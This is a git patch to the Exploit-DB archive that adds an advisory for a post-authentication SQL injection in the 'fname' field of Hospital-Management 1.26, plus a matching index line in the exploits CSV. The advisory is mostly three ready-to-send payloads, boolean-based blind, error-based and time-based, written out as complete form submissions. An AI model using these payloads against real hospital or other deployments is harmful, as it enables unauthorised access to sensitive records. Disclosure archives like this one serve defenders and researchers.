From 401d4ea8dc0fb00865417b3d090922cbc1cb94e8 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 19 Sep 2019 05:03:18 +0000 Subject: [PATCH] DB: 2019-09-19 1 changes to exploits/shellcodes Hospital-Management 1.26 - 'fname' SQL Injection --- exploits/php/webapps/47398.txt | 29 +++++++++++++++++++++++++++++ files_exploits.csv | 1 + 2 files changed, 30 insertions(+) create mode 100644 exploits/php/webapps/47398.txt diff --git a/exploits/php/webapps/47398.txt b/exploits/php/webapps/47398.txt new file mode 100644 index 000000000..a7dc9f26c --- /dev/null +++ b/exploits/php/webapps/47398.txt @@ -0,0 +1,29 @@ +# Exploit Title: Hospital-Management 1.26 - 'fname' SQL Injection +# Author: Cakes +# Discovery Date: 2019-09-18 +# Vendor Homepage: https://github.com/Mugerwa-Joseph/hospital-management +# Software Link: https://github.com/Mugerwa-Joseph/hospital-management/archive/master.zip +# Tested Version: 1.26 +# Tested on OS: CentOS 7 +# CVE: N/A + +# Discription: +# Simple SQL injection after application authentication. + +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: + +fname=tester'||(SELECT 0x72516679 FROM DUAL WHERE 9119=9119 AND 1379=1379)||'&sname=tester&email=test@tester.com&phone=1123456783&address=123 happy lane&gender=Male&bloodgroup=B&birthyear=2002&btn=Add + +# Type: error-based +# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) +# Payload: + +fname=tester'||(SELECT 0x53495778 FROM DUAL WHERE 5761=5761 AND (SELECT 9648 FROM(SELECT COUNT(*),CONCAT(0x71787a7a71,(SELECT (ELT(9648=9648,1))),0x716b786b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&sname=tester&email=test@tester.com&phone=1123456783&address=123 happy lane&gender=Male&bloodgroup=B&birthyear=2002&btn=Add + +# Type: time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) +# Payload: + +fname=tester'||(SELECT 0x5144494b FROM DUAL WHERE 1043=1043 AND (SELECT 1880 FROM (SELECT(SLEEP(5)))AmmF))||'&sname=tester&email=test@tester.com&phone=1123456783&address=123 happy lane&gender=Male&bloodgroup=B&birthyear=2002&btn=Add \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 5f5c94802..d76516118 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -41740,3 +41740,4 @@ id,file,description,date,author,type,platform,port 47388,exploits/php/webapps/47388.txt,"College-Management-System 1.2 - Authentication Bypass",2019-09-14,cakes,webapps,php, 47392,exploits/cfm/webapps/47392.txt,"Symantec Advanced Secure Gateway (ASG) / ProxySG - Unrestricted File Upload",2019-09-16,"Pankaj Kumar Thakur",webapps,cfm, 47395,exploits/php/webapps/47395.txt,"CollegeManagementSystem-CMS 1.3 - 'batch' SQL Injection",2019-09-16,cakes,webapps,php, +47398,exploits/php/webapps/47398.txt,"Hospital-Management 1.26 - 'fname' SQL Injection",2019-09-18,cakes,webapps,php,